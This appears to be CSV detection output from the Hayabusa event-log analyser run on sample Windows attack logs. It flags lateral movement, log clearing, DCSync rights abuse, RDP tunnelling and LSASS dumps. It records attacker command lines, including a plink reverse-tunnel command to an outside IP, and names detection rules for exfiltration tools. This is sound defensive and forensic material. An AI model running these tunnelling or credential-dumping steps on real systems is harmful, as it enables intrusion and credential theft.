+09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx -2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx -2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx -2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File 